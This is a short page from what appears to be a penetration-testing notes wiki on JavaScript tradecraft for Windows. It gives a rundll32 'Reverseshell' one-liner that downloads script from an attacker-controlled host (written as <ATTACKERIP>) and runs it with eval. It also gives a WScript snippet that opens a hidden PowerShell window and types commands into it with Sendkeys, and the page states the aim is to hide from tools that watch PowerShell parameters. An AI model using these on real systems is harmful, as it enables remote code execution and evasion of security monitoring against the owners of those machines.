Javascript

From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

Reverseshell

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ATTACKERIP>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

receiving server is located here more info here


Create and Install a Certificate in User Store

JSEnroll


Sendkeys and execute powershell example

var o= new ActiveXObject("WScript.Shell");
o.Run("powershell.exe -windowstyle hidden");
WScript.Sleep(5000);
o.AppActivate("Powershell");
o.Sendkeys("Get-Process > .\\output.txt");
o.Sendkeys("~");

execute with: wscript "<filename&path>.js" hide from tools that are watching for Powershell.exe parameters